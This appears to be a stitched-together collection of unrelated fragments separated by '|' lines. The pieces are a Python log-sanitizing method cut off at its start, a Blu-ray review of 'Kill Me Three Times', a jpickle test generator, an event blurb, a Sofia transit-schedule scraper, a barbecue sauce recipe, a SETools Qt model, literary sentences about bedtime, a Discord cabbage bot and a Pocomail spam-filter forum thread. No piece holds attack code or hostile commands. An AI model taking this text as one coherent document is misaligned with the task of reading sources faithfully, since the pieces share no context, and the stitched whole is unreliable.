            # mask the whole string if it mentions a sensitive field
            sl = s.lower()
            for field in self.KEYS:
                if field not in sl:
                    continue
                if 'invalid' in s or 'error' in s:
                    return '***(contains invalid {})***'.format(field)
                else:
                    return '***(contains {})***'.format(field)
            return s

        if isinstance(value, str):
            # handle basic strings
            value = _check_str(value)
        elif isinstance(value, bytes):
            # handle bytes
            value = _check_str(value.decode('utf8', 'replace'))
        elif isinstance(value, (list, tuple, set)):
            # handle list-like, preserving the original container type
            orig_type = type(value)
            value = list(value)
            for i, item in enumerate(value):
                value[i] = self.sanitize(key, item)
            value = orig_type(value)
        elif isinstance(value, dict):
            # handle dicts.
            # BUG FIX: the loop previously rebound both ``key`` and
            # ``value`` as loop variables over the dict being indexed
            # (``for key, value in value.items(): value[key] = ...``),
            # so each assignment mutated the ITEM, not the dict, and
            # the dict was never actually sanitized.
            for sub_key in list(value):
                value[sub_key] = self.sanitize(sub_key, value[sub_key])
        else:
            # handle everything else by sanitizing its JSON encoding
            # note that we don't want to use the JSON encoded value if it's
            # not being sanitized, because it will end up double-encoded
            value_json = json.dumps(value)
            sanitized = _check_str(value_json)
            if sanitized != value_json:
                value = sanitized
        return value
class TestError(Exception):
    """Dummy error raised deliberately to verify Sentry error reporting."""
    def __init__(self):
        super().__init__('This is a dummy error for testing reporting')


class SudoError(Exception):
    """Raised when sudo privileges are required but unavailable."""
    pass


class UtilsHTTPError(Exception):
    """Raised for HTTP-related failures in utility helpers."""
    pass
|
The double crosses pile up in this comedic thriller starring Simon Pegg as a jaded hit man on a seemingly routine job. The assassin finds himself at the center of three intertwining tales of murder, mayhem, blackmail and revenge when a gambling addict, a small town "Lady Macbeth," a club owner, a policeman and a lover all converge on the same mark.
Can a movie skirt critical disaster based on the undeniable allure of a silly mustache alone? Well, maybe not alone, but it can certainly help. A lot. Derivative yet marked by just enough personality to avoid complete mediocrity, 'Kill Me Three Times' attempts to bring a few playful twists to the tried-and-true crime genre. Unfortunately, outside of Simon Pegg's amusing whiskers, these cinematic spins really aren't very original, leading to a familiar but still worthwhile pulp thriller. We may have seen this exact kind of story before -- but this time it features a man with ridiculous facial hair! Now, who says the movie industry is out of ideas?
When a jealous husband (Callan Mulvey) discovers that his wife (Alice Braga) is cheating on him, he hires a professional hit-man, Charlie Wolfe (Simon Pegg), to murder her. But when Wolfe attempts to go through with the assignment, he discovers that another party may already be doing his job for him. As new twists and turns are revealed, the once simple assassination becomes increasingly complicated, exposing a slew of greedy motivations that threaten to leave a growing trail of bodies in their wake.
Structured into three distinct parts, the script jumps around in time and perspective. The first act primarily focuses on the middle of the plot, while the second act largely flashes back to the beginning of the story, and the third act concludes the timeline. This little bit of narrative flash is nothing new, but the mixed-up chronology works as intended, allowing plot twists to unravel as previously unknown information is revealed, adding extra layers to scenes that have already passed. Likewise, the filmmakers maintain a brisk pace throughout the winding runtime, and balance the film's darkly comedic tone fairly well.
Mixing comedy and bloodshed, the movie offers some solid thrills and uncomfortable laughs. As the initially unexpected murder plot unravels, the amateur culprits give off a slightly bumbling quality, and their back and forth squabbling amidst their deadly actions is amusing. At the same time, the flick certainly does not shy away from carnage, resulting in some rather bloody violence and deaths that manage to maintain a humorous spin thanks to a faintly cartoonish style. A few splashy visual flourishes are thrown in here and there as well, including lots of striking aerial footage of the Australian beach locales, and some dramatic slow motion shots that heighten key moments.
Serving as our main vantage point into the story, Simon Pegg's Charlie Wolfe proves to be a fairly fun character. With his horseshoe mustache and goofy smile, there are times when the killer seems like he just walked out of an entirely different movie, but this disconnect actually works well with the film's pulpy tone. And though the man might seem like a joke on the outside, he quickly cements himself as a legitimate threat (minus a few mishaps here and there). The rest of the cast is also very effective, making the most out of their stock character roles -- especially Teresa Palmer who seems to relish every moment of her Lady Macbeth-like turn as Lucy. Also, I'd certainly be remiss if I didn't mention the inclusion of Luke Hemsworth. Yes, that's right, there's a third Hemsworth brother. Not Chris. Not Liam. Luke. And though he might be the Stephen Baldwin of the Hemsworth clan, he's still a solid performer.
Talented cast aside, 'Kill Me Three Times' is not without some notable problems. At the end of the day, none of the characters are very developed. Instead, they're simply pulp genre archetypes playing out standard pulp genre plot threads. There's an abusive husband, a cheating wife, a desperate gambler, a greedy femme fatale, a corrupt cop, a deadly killer, and a twisting scheme that involves -- yes, you guessed it -- insurance fraud! Though some great flicks have resulted from ingredients like this in the past, the script never really does anything particularly interesting with them. Sure, it's clear that the filmmakers have a lot of cheeky admiration for all of these cliches and conventions, but this genre love never evolves into the kind of cinematic creativity found in similar efforts from directors like the Coen Brothers and Quentin Tarantino.
Not bad. That's the general thought I had after finishing 'Kill Me Three Times.' Not particularly good, and definitely far from great -- but not bad. While that might sound like pretty faint praise, that's probably because... well, it is faint praise. And that's about all this flick deserves. There's a decent twist or two, but the script and direction aren't as clever as they need to be, leading to a mostly basic crime thriller that tries to dress up its deficiencies with a jumbled structure and a dumb mustache... and it almost gets away with it.
Magnolia brings 'Kill Me Three Times' to Blu-ray on a single BD-50 disc that comes housed inside a keepcase with a cardboard slipcover. After some skippable trailers, the disc transitions to a traditional menu screen. The packaging indicates the release is Region A coded.
The movie is provided with a 1080p/AVC MPEG-4 transfer in the 2.39:1 aspect ratio. Sharp and colorful, this is a very impressive image free from any major flaws.
The source is clean and crisp with no signs of troublesome noise. Clarity is exceptional throughout, offering sharp fine details and textures. Wide aerial shots of the ocean and beach locales are especially striking, and the waters shimmer nicely off the screen. The color palette features richly saturated primaries with bold reds, blues, and greens that pop from the screen. With that said, contrast is rather blown out at times, leading to a slightly washed out look in whites during bright sequences. Thankfully, blacks are deep and inky without crushing. Though artifacts are essentially absent, there is a hint of aliasing and contouring in a shot or two.
With often gorgeous color and impeccable detail, 'Kill Me Three Times' looks fantastic on Blu-ray. The faintly cartoonish visual style works well with the tone, and the transfer is technically proficient.
The film is presented with an English DTS-HD MA 5.1 track along with English SDH and Spanish subtitles. Though not demo worthy, the mix bolsters the content well, adding some nice kick and lively personality to the proceedings.
Dialogue is clear and well prioritized with no balance issues to report. The soundstage is relatively immersive, with a solid sense of general atmosphere and surround use (birds chirping, crashing waves, blowing wind), helping to enhance the beach town ambiance. Directionality is also good, spreading appropriate panning effects between speakers as characters and cars move about the screen. Likewise, the movie's livelier moments offer a nice jolt, lending gunshots and explosions a hefty punch. Dynamic range is also wide and distortion free, and the film's playful score comes through well with pleasing fidelity and separation.
For a fairly low budget crime flick, the audio here sounds quite good. The sound design isn't as enveloping as more robust tracks, but it's effective all the same.
Magnolia has provided a solid assortment of supplements, including two commentaries. All of the special features are presented in 1080p with Dolby Digital 2.0 sound.
Commentary with Director Kriv Stenders and Cinematographer Geoffrey Simpson – Stenders and Simpson sit down for a steady and informative discussion about the movie. The pair focuses on the film's shots and visual style, but also address a wealth of production trivia including details on casting, editing, influences, storyboards, deleted material, locations, and scheduling. Filled with interesting movie-making tidbits, this is a great listen for budding filmmakers.
Commentary with Director Kriv Stenders and Producers Tania Chambers, Laurence Malkin, and Share Stallings – For the second commentary, Stenders is now joined by a trio of producers. Though a lot of the same ground is covered here, the participants expand upon topics already broached and offer some more details about the film's shoot. Though I'm not sure that two commentaries were really necessary, fans might want to take a listen.
Deleted Scene (HD, 3 min) – A single deleted scene featuring a musical performance by Alice is included. This is a strong sequence but might be a little too on the nose.
The Making of Kill Me Three Times (HD, 18 min) – This is an informative behind-the-scenes doc that features cast & crew interviews. The casting, characters, visuals, and script are all addressed along with several worthwhile production insights.
Q&A (HD, 14 min) – Recorded in 2014 at the BFI London Film Festival, this Q&A features actor Simon Pegg and the film's producers. The group discusses how they accommodated Pegg's limited schedule, the movie's inspirations, and the drawbacks to a horseshoe mustache.
Storyboards (HD, 5 min) – This is a reel of storyboards for several important scenes set to music.
Behind the Scenes Photo Gallery – Here we get a collection of on-set photos.
Poster Gallery - A gallery of character posters from the film is included.
'Kill Me Three Times' is a familiar but still worthwhile pulp crime thriller. Though the plot and characters are pretty basic, the cast and darkly comedic tone are entertaining. On the technical front, the disc's video and audio are both strong. Magnolia has also provided a nice assortment of supplements, including two commentaries and a behind-the-scenes featurette. The movie doesn't break any new ground, but this is still a loving little genre flick that might appeal to big fans of similar efforts. Worth a look.
|
#!/usr/bin/python
from __future__ import print_function
import pickle
import binascii
class MyClass:
    """Smallest pickle fixture: a single string attribute with a known default."""
    def __init__(self):
        # Default payload checked by the generated JS assertions.
        self.data = "test"
class MyOtherClass:
    """Fixture holding a nested MyClass plus a list of two more instances.

    The first list element's ``data`` is overwritten so the generated JS
    tests can tell it apart from the default value.
    """
    def __init__(self):
        self.myclass = MyClass()
        first, second = MyClass(), MyClass()
        first.data = "new test value"
        self.myclasses = [first, second]
class MySubClass(MyOtherClass):
    """Fixture subclass adding ``subvalue`` on top of MyOtherClass state."""
    def __init__(self):
        # Python 2 old-style class hierarchy: call the base initializer
        # directly rather than via super().
        MyOtherClass.__init__(self)
        self.subvalue = 12
# --- Fixture objects whose pickled (protocol 2) form is embedded below ---
myclass = MyClass()
myclassescontainer = { "myclass1" : MyClass(), "myclass2" : MyClass() }
myclassescontainer["myclass1"].data = "new test value 1"
myclassescontainer["myclass2"].data = "new test value 2"
myotherclass = MyOtherClass()
mysubclass = MySubClass()
# Generate a mocha test suite that feeds the pickled fixtures to jpickle.
# NOTE: pickle.dumps(...).encode('string-escape') is Python 2 only; it
# escapes the raw pickle stream so it can be embedded as a JS string literal.
testfile = open("./class_tests.js", "w")
# Preamble: requires and the JS-side emulation classes jpickle maps onto.
print("var assert = require('assert'),\n" \
" util = require('util'),\n" \
" jpickle = require('../lib/jpickle');\n\n", file = testfile )
print("function MyClass() {\n" \
"}\n\n", file = testfile )
print("function MyOtherClass() {\n" \
" this.mymethod = function() { return this.myclass.data + ' foo!';}; \n" \
"}\n\n", file = testfile )
print("function MySubClass() {\n" \
"}\n" \
"util.inherits(MySubClass, MyOtherClass);\n\n", file = testfile )
# Register the emulation classes under their pickled Python names.
print("jpickle.emulated['__main__.MyClass'] = MyClass;\n" \
"jpickle.emulated['__main__.MyOtherClass'] = MyOtherClass;\n" \
"jpickle.emulated['__main__.MySubClass'] = MySubClass;\n\n", file = testfile )
print("\ndescribe('pickle version 2 classes', function() {\n", file = testfile )
# One "it" block per fixture, each embedding the escaped pickle stream.
print(" it('should decode simple classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.data, 'test');\n" \
" });\n\n" % pickle.dumps( myclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode simple classes in a container', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded['myclass1'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass2'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass1'].data, 'new test value 1');\n" \
" assert.strictEqual(decoded['myclass2'].data, 'new test value 2');\n" \
" });\n\n" % pickle.dumps( myclassescontainer, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode a subclass and a superclass', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded instanceof MySubClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" assert.strictEqual(decoded.subvalue, 12);\n" \
" });\n\n" % pickle.dumps( mysubclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing method', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded.mymethod(), 'test foo!');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print("});\n\n", file = testfile )
# Close explicitly so the generated test file is fully flushed to disk
# (the original leaked the file handle and relied on interpreter exit).
testfile.close()
|
The second weekend is aligned with the Full Moon Phase. This is mainly associated with completeness, sustainability, responsibility and accountability. The projects presented in this phase are critically engaged with the ongoing state of colonialism in former empires such as the former French and Belgian colonies, where colonialism makes itself felt in multinational extractivism activities or national and international laws for newcomers.
Masterclass - Colonisation in Belgian films in the last 30 years: a taboo?
|
import requests
import re
import time
from html.parser import HTMLParser
import json
import os
import datetime
from multiprocessing.dummy import Pool as ThreadPool
class PageParsing:
    """Parsing class with static methods.

    Scrapes schedules.sofiatraffic.bg: the main page lists transport routes,
    each route page lists schedules (weekday/holiday), directions and stops,
    and a per-stop endpoint returns the departure times.
    """

    # Entry page of the Sofia public transport schedules site.
    MAIN_PAGE = "http://schedules.sofiatraffic.bg/"
    # Route links of interest start with one of these transport kinds.
    TRANSPORT_RE = r'(tramway|trolleybus|autobus){1}'

    @classmethod
    def parse_schedule_buttons(cls, content):
        """Return the schedule ids found in ``content``.

        Schedule tabs are marked by elements whose id has the form
        ``schedule_<id>_button``; only the ``<id>`` part is returned.
        """
        SCHEDULE_BTN_ID_RE = r'id="schedule_\d*_button"'
        schedule_btns = re.findall(SCHEDULE_BTN_ID_RE, content)
        # contains the found schedule ids
        btns = []
        for btn in schedule_btns:
            schedule_id = btn.replace('id="schedule_', "")
            schedule_id = schedule_id.replace('_button"', "")
            btns.append(schedule_id)
        return btns

    @classmethod
    def parse_schedule_name(cls, content, schedule_id):
        """Return the display name of the schedule tab with ``schedule_id``.

        The name is e.g. "делник" or "предпразник / празник" -- though since
        the page text is the repr of a bytes object, Cyrillic shows up as
        literal backslash escapes (see check_is_weekly_schedule).
        """
        SCHEDULE_BTN_RE = r'id="schedule_{}_button".*?>.*?</a>'.format(schedule_id)
        SCHEDULE_BTN_TITLE_RE = r'<span>.*?</span>'
        schedule_btn = re.findall(SCHEDULE_BTN_RE, content)[-1]
        schedule_title = re.findall(SCHEDULE_BTN_TITLE_RE, schedule_btn)[-1]
        schedule_title = schedule_title.replace("<span>", "")
        schedule_title = schedule_title.replace("</span>", "")
        return schedule_title

    @classmethod
    def check_is_weekly_schedule(cls, schedule):
        """Return True when ``schedule`` is the weekday ("делник") schedule.

        Page content is obtained as ``"{}".format(response.content)``, i.e.
        the repr of a bytes object, so UTF-8 Cyrillic survives only as
        literal backslash escape sequences.  The earlier comparisons against
        the decoded string (and then against a bytes literal) therefore
        always returned False; compare against the escaped form instead.
        """
        return schedule == r'\xd0\xb4\xd0\xb5\xd0\xbb\xd0\xbd\xd0\xb8\xd0\xba'

    @classmethod
    def parse_routes_stops(cls, content):
        """Return a list of stop dicts parsed from a route page.

        Each dict has keys ``stop_name``, ``schedule``, ``direction`` and
        ``stop_no``; schedule/direction are filled in later by
        get_route_stations().
        """
        STOPS_LI_RE = r'<li class="\s+stop_\d*">.*?</li>'
        STOP_NAME_A_RE = r'<a .*? class="stop_change".*?>.*?</a>'
        STOP_NAME_RE = r'>.*?<'
        STOP_HREF_A_RE = r'<a.*?class="stop_link".*?>.*?</a>'
        STOP_HREF_RE = r'id=".*?"'
        stops_li = re.findall(STOPS_LI_RE, content)
        # contains the found stops
        stops = []
        for stop_li in stops_li:
            # get the first (and only) stop name a tag
            stop_name_a = re.findall(STOP_NAME_A_RE, stop_li).pop()
            # strip the surrounding tag characters from the stop name
            stop_name = re.findall(STOP_NAME_RE, stop_name_a).pop()
            stop_name = stop_name.replace(">", "")
            stop_name = stop_name.replace("<", "")
            # get the first (and only) stop link a tag
            stop_href_a = re.findall(STOP_HREF_A_RE, stop_li).pop()
            # extract the id="..." attribute carrying the stop numbers
            stop_href = re.findall(STOP_HREF_RE, stop_href_a).pop()
            stop_href = stop_href.replace('id="', "")
            stop_href = stop_href.replace('"', "")
            ids = re.findall(r"\d{1,}", stop_href)
            stops.append({
                "stop_name": stop_name,
                "schedule": "",     # set per-schedule in get_route_stations
                "direction": "",    # set per-direction in get_route_stations
                "stop_no": ids[2]
            })
        return stops

    @classmethod
    def parse_routes_times(cls, content):
        """Return every h:mm / hh:mm formatted time string in ``content``."""
        TIME_RE = r'\d{0,2}:\d{2}'
        return re.findall(TIME_RE, content)

    @classmethod
    def generate_route_stops_url(cls, schedule, direction, stop_no):
        """Build the relative per-stop schedule URL,
        e.g. "server/html/schedule_load/4018/1165/1254"."""
        return "server/html/schedule_load/{}/{}/{}".format(schedule, direction, stop_no)

    @classmethod
    def parse_route_direction(cls, content, route):
        """Return a set of (url, title) tuples for the route's directions."""
        DIRECTIONS_RE = r'<a href="/{}#direction/\d*" id="schedule_direction_\d*_\d*_button" class=".*?schedule_view_direction_tab">.*?</a>'.format(route)
        directions_result = re.findall(DIRECTIONS_RE, content)
        directions = set()
        # parse the data of the directions
        for direction in directions_result:
            # relative URL of the direction page (leading slash stripped)
            URL_RE = r'/\w*/.*?/\d*'
            url_result = re.search(URL_RE, direction)
            url = url_result.group(0)
            url = url.replace("/", "", 1)
            # human-readable direction title taken from the span text
            TITLE_RE = r'n>.*?<'
            title_result = re.search(TITLE_RE, direction)
            title = title_result.group(0)
            title = title.replace("n>", "")
            title = title.replace("<", "")
            directions.add((url, title))
        return directions

    @classmethod
    def get_route_stations(cls, route):
        """Crawl every (schedule, direction, stop) combination of ``route``,
        write the collected departure times to a dated JSON file and return
        the collected records."""
        time_last = time.time()
        route_url = "{}{}".format(cls.MAIN_PAGE, route)
        r = requests.get(route_url)
        # str(bytes): non-ASCII text ends up as literal backslash escapes.
        content = "{}".format(r.content)
        # all stops of this route
        stops = cls.parse_routes_stops(content)
        # the schedule buttons (weekday / pre-holiday / holiday ...)
        schedules = cls.parse_schedule_buttons(content)
        # the travel directions of the route
        directions = cls.parse_route_direction(content, route)
        direction_stops_times = []
        for schedule in schedules:
            # get the schedule type name
            schedule_name = cls.parse_schedule_name(content, schedule)
            for direction in directions:
                # numeric direction id from the direction URL
                direction_id = re.findall(r"\d{1,}", direction[0]).pop()
                for stop in stops:
                    # tag the stop with the current schedule/direction
                    stop["schedule"] = schedule_name
                    stop["direction"] = direction[1]
                    # fetch the departure times for this stop
                    stop_url = cls.generate_route_stops_url(schedule, direction_id, stop["stop_no"])
                    stop_url = "{}{}".format(cls.MAIN_PAGE, stop_url)
                    sr = requests.get(stop_url)
                    stop_content = "{}".format(sr.content)
                    # skip failed requests with an empty body
                    if stop_content == "":
                        continue
                    schedule_times = cls.parse_routes_times(stop_content)
                    # skip pages that contained no departure times
                    if len(schedule_times) == 0:
                        continue
                    direction_stops_times.append({
                        "url": stop_url,
                        "times": schedule_times,
                        "schedule_id": schedule,
                        "weekly_schedule": cls.check_is_weekly_schedule(schedule_name),
                        "direction_id": direction_id,
                        "stop": {
                            "schedule": schedule_name,
                            "direction": direction[1],
                            "stop_name": stop["stop_name"],
                            "stop_no": stop["stop_no"]
                        }
                    })
        # persist the result as <YYYY-MM-DD>/<route>.json
        today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
        json_file = "{}/{}.json".format(today, route.replace("/", "_"))
        temp_file = open(json_file, 'w')
        temp_file.write(json.dumps(direction_stops_times))
        temp_file.close()
        current_time = time.time()
        print(json_file, current_time - time_last)
        return direction_stops_times

    @classmethod
    def run_thread(cls, url):
        """Thread-pool worker: crawl the single route named in ``url``
        (a one-entry {link text: href} dict)."""
        line = list(url.keys())[0]
        return cls.get_route_stations(url.get(line))

    @classmethod
    def parse_traffic_links(cls, content):
        """Return [{link text: href}, ...] for every transport link found."""
        class TransportLinksParser(HTMLParser):
            """Collects <a> tags whose href matches TRANSPORT_RE."""
            def __init__(self):
                HTMLParser.__init__(self)
                self.recording = 0
                self.data = []
                self.link = ""
            def handle_starttag(self, tag, attributes):
                if tag != 'a':
                    return
                for name, val in attributes:
                    if name == 'href' and re.match(cls.TRANSPORT_RE, val):
                        self.recording += 1
                        self.link = val
                        break
                else:
                    self.link = ""
            def handle_endtag(self, tag):
                if tag == 'a' and self.recording:
                    self.recording -= 1
            def handle_data(self, data):
                if self.recording and self.link != "":
                    self.data.append({data: self.link})
        lp = TransportLinksParser()
        lp.feed(content)
        return lp.data

    @classmethod
    def parse_main_page(cls):
        """Crawl the main page: collect every route link and fetch each
        route's schedules on a small thread pool."""
        r = requests.get(cls.MAIN_PAGE)
        content = "{}".format(r.content)
        urls = cls.parse_traffic_links(content)
        # one output directory per day, named YYYY-MM-DD
        today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
        if not os.path.exists(today):
            os.mkdir(today)
        # crawl on 4 worker threads
        pool = ThreadPool(4)
        pool.map(cls.run_thread, urls)
if __name__ == '__main__':
    # Crawl the whole site and report the total wall-clock duration.
    started_at = time.time()
    print("Started parsing the {} website!".format(PageParsing.MAIN_PAGE))
    PageParsing.parse_main_page()
    print("Parsed for {} seconds".format(time.time() - started_at))
|
Baste your next roast with this Southern Barbecue Sauce Recipe.
This Southern Barbecue Sauce Recipe is great for basting your meat during the last hour of cooking.
Next time you're ready to roast meat or use the grill, whip together this Southern Barbecue Sauce Recipe. Your friends and family will thank you.
In saucepan, combine vinegar, water, brown sugar, mustard, paprika, salt and pepper.
Add lemon juice, onion, butter and ketchup; bring to a boil, and boil for 20 minutes, uncovered. Add Worcestershire sauce and liquid smoke; pour into a bottle and cover tightly.
To use: Put on meat for at least 1 hour of cook time, basting and turning meat often.
Without an amount listed for the liquid smoke, I'm going to substitute 1 t. of hickory salt that I have on hand.
|
# Copyright 2016, Tresys Technology, LLC
#
# This file is part of SETools.
#
# SETools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1 of
# the License, or (at your option) any later version.
#
# SETools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SETools. If not, see
# <http://www.gnu.org/licenses/>.
#
import stat
from PyQt5.QtCore import Qt
from .models import SEToolsTableModel
class GenfsconTableModel(SEToolsTableModel):

    """Table-based model for genfscons."""

    headers = ["FS Type", "Path", "File Type", "Context"]

    _filetype_to_text = {
        0: "Any",
        stat.S_IFBLK: "Block",
        stat.S_IFCHR: "Character",
        stat.S_IFDIR: "Directory",
        stat.S_IFIFO: "Pipe (FIFO)",
        stat.S_IFREG: "Regular File",
        stat.S_IFLNK: "Symbolic Link",
        stat.S_IFSOCK: "Socket"}

    def data(self, index, role):
        """Return the cell text (DisplayRole) or the rule object (UserRole)."""
        # Guard clauses instead of one large nested conditional.
        if not self.resultlist or not index.isValid():
            return None
        rule = self.resultlist[index.row()]
        if role == Qt.UserRole:
            return rule
        if role != Qt.DisplayRole:
            return None
        column = index.column()
        if column == 0:
            return rule.fs
        if column == 1:
            return rule.path
        if column == 2:
            return self._filetype_to_text[rule.filetype]
        if column == 3:
            return str(rule.context)
        return None
|
Vincent Spaulding did what he could to cheer me up, but by bedtime I had reasoned myself out of the whole thing.
And when it was bedtime the old man rose up and held out his hand, and says: “Look at it, gentlemen and ladies all; take a-hold of it; shake it.
All day long she dared not go out of doors, and when bedtime had come, the witch’s daughter got into bed first, so as to lie at the far side, but when she was asleep, the other pushed her gently to the front, and took for herself the place at the back, close by the wall.
When Hrothgar’s bedtime comes he leaves the hall in charge of Beowulf, telling him that never before has he given to another the absolute wardship of his palace.
When bedtime came, we all kissed mamma and retired early, as usual.
The hour between tea and bedtime was sufficiently tedious, as both of us were naturally much preoccupied.
I did not like this iteration of one idea—this strange recurrence of one image, and I grew nervous as bedtime approached and the hour of the vision drew near.
In the first weeks the days were long; they often, at their finest, gave me what I used to call my own hour, the hour when, for my pupils, teatime and bedtime having come and gone, I had, before my final retirement, a small interval alone.
A bedtime visit to the east gable produced no result.
|
import cabbagerc
import discord
from discord.ext import commands
from phrasebook.Phrasebook import Phrasebook
from datetime import datetime
# Number of cabbages currently in stock; decremented by takeCabbage below.
cabbageNumber = 2
# Discord user who took the last cabbage (0 until the stock runs out).
cabbageStealer = 0
# When the last cabbage was taken (0 initially, a datetime afterwards).
cabbageTheftTime = 0
description = '''Bot That Performs Cabbage-Related Functions'''
# Command prefix and (below) the token come from the local cabbagerc config.
bot = commands.Bot(command_prefix=cabbagerc.PREF, description=description)
# Extension modules registered with the bot by autoset() at startup.
modules = [
	'mod.roller.roller',
	'mod.trump.trump',
	'mod.admin.admin',
	'mod.poll.poll',
	'mod.starboard.starboard',
	'mod.scp.scp'
]
def autoset():
	''' Setup functions '''
	# Register every configured extension module with the bot.
	for extension in modules:
		bot.load_extension(extension)
def timeStrSince(d):
	'''Return a rough human-readable description of the time since ``d``.

	``d`` is a datetime; the result looks like
	"2 days, 3 hours, 4 minutes and 5 seconds", omitting leading units
	that are zero.  Returns 'just now' for a zero-second difference.
	'''
	diff = datetime.now() - d
	ts = int(diff.total_seconds())
	con = ''
	if ts == 0:
		return 'just now'
	con += str(ts % 60) + ' seconds'
	minute = int(ts/60)
	if minute == 0:
		return con
	con = str(minute % 60) + ' minutes and ' + con
	hour = int(minute/60)
	if hour == 0:
		return con
	con = str(hour % 24) + ' hours, ' + con
	# Integer division here: the original used float division, which made
	# the day == 0 check unreliable and produced strings like "2.0 days".
	day = int(hour/24)
	if day == 0:
		return con
	con = str(day) + ' days, ' + con
	return con
@bot.event
async def on_ready():
	'''Announce on the console that the bot has connected.'''
	banner = 'USER: ' + bot.user.name + ' [' + bot.user.id + ']'
	print('CABBAGE IS ONLINE')
	print(banner)
	print('=================')
@bot.command(pass_context=True)
async def intro(ctx):
	''' Test Command '''
	phrases = Phrasebook(ctx, bot)
	# Send the two canned introduction lines in order.
	for key in ('intro1', 'intro2'):
		await bot.say(phrases.pickPhrase('core', key))
@bot.command(pass_context=True)
async def cabbages(ctx):
	''' Displays the current number of cabbages '''
	p = Phrasebook(ctx, bot)
	global cabbageNumber
	global cabbageStealer
	global cabbageTheftTime
	print('User ' + str(ctx.message.author) + ' requested cabbage count (currently ' + str(cabbageNumber) + ')')
	# Cabbage counts are not reported in the small hours (before 05:00 local).
	if datetime.now().hour < 5:
		await bot.say(p.pickPhrase('cabbage', 'checkLate'))
		return
	if cabbageNumber == 0:
		# All gone: report who took the last one and how long ago.
		# NOTE(review): this passes the author object itself, while
		# takeCabbage passes cabbageStealer.name -- confirm which form the
		# 'checkOut' phrase actually expects.
		await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer, timeStrSince(cabbageTheftTime)))
	else:
		await bot.say(p.pickPhrase('cabbage', 'check', cabbageNumber))
@bot.command(pass_context=True)
async def takeCabbage(ctx):
	''' Take a cabbage for yourself
	Be careful, though: once the cabbages are gone, they're gone until I restart. '''
	p = Phrasebook(ctx, bot)
	global cabbageNumber
	global cabbageStealer
	global cabbageTheftTime
	if cabbageNumber > 1:
		# Plenty left: hand one out and log the accurate remaining count.
		cabbageNumber = cabbageNumber - 1
		print('User ' + str(ctx.message.author) + ' took cabbage (now ' + str(cabbageNumber) + ')')
		if cabbageNumber > 100:
			await bot.say(p.pickPhrase('cabbage', 'takePlenty', cabbageNumber))
		else:
			await bot.say(p.pickPhrase('cabbage', 'take', cabbageNumber))
	elif cabbageNumber == 1:
		# Last cabbage: record who took it and when, for later blame.
		cabbageNumber = 0
		print('User ' + str(ctx.message.author) + ' took the last cabbage')
		await bot.say(p.pickPhrase('cabbage', 'takeLast'))
		cabbageStealer = ctx.message.author
		cabbageTheftTime = datetime.now()
	else:
		# None left.  (The original logged the count before branching, so
		# this path falsely claimed a cabbage was taken "(now -1)".)
		print('User ' + str(ctx.message.author) + ' asked for a cabbage, but none are left')
		await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer.name, timeStrSince(cabbageTheftTime)))
# Load all extensions, then hand control to discord.py's event loop.
autoset()
bot.run(cabbagerc.TKN)
|
Poco Forums • View topic - Spam filtering app that works well with Pocomail?
Spam filtering app that works well with Pocomail?
tribble wrote: I'd like to try a simple experiment. Could I send you guys my spam and good corpus, replace your own and see if the results improve (or vice versa as I receive, on average, 300 spam messages a day).
I reset my results for each beta and final release and within a day or two am right back to >98%.
I have >56K junk words and >18K good words in my corpi, with 98.83% accuracy today.
Hey, tribble. If you're still interested in trying this little experiment, I'd be willing to give it a shot.
How would we do that? I would hate to replace my spam/good corpi (corpuses?) with yours and not be able to swap back. Afraid you'd have to walk me through what to do if we tried it?
For the record: By creating two non-Bayesian filters, I now have 99 percent accuracy. But any email that isn't caught by those two filters simply isn't caught by the Bayesian filter. It lands in my inbox and I use the spam icon to label it as spam and move it to my junk mailbox. Yet it seems to have no impact later on actually training the Bayesian filter. When I turn off the Bayesian filter altogether, the two non-Bayesian filters do about the same amount of filtering.
In other words, I honestly think the Bayesian filter is having almost NO impact on my Junk mail, even with spam/good corpi of 39,000+ spam and 34,000+ good.
As an alternative to trying someone else's files on your computer, maybe you could send one of us your DBSpam.ini, DBGood.ini, poco.ini, filters.ini and events.ini files to try on our systems for a day? That would give us the chance to make sure your filters are set up correctly as well as checking your corpus. I don't think there's anything personal in those files (account info is in accounts.ini) but it's up to you.
The process to replace our respective files should be easy.
2) Copy, move or rename your DBGood.ini and DBSpam.ini files.
Restart Poco (or Barca). Adjust your filters so the BF is the first in the list (drag and drop).
I'll also give you what my BF related settings are for comparison).
I don't think I can post the whole corpi in this forum so I'll need an email address (send me a PM).
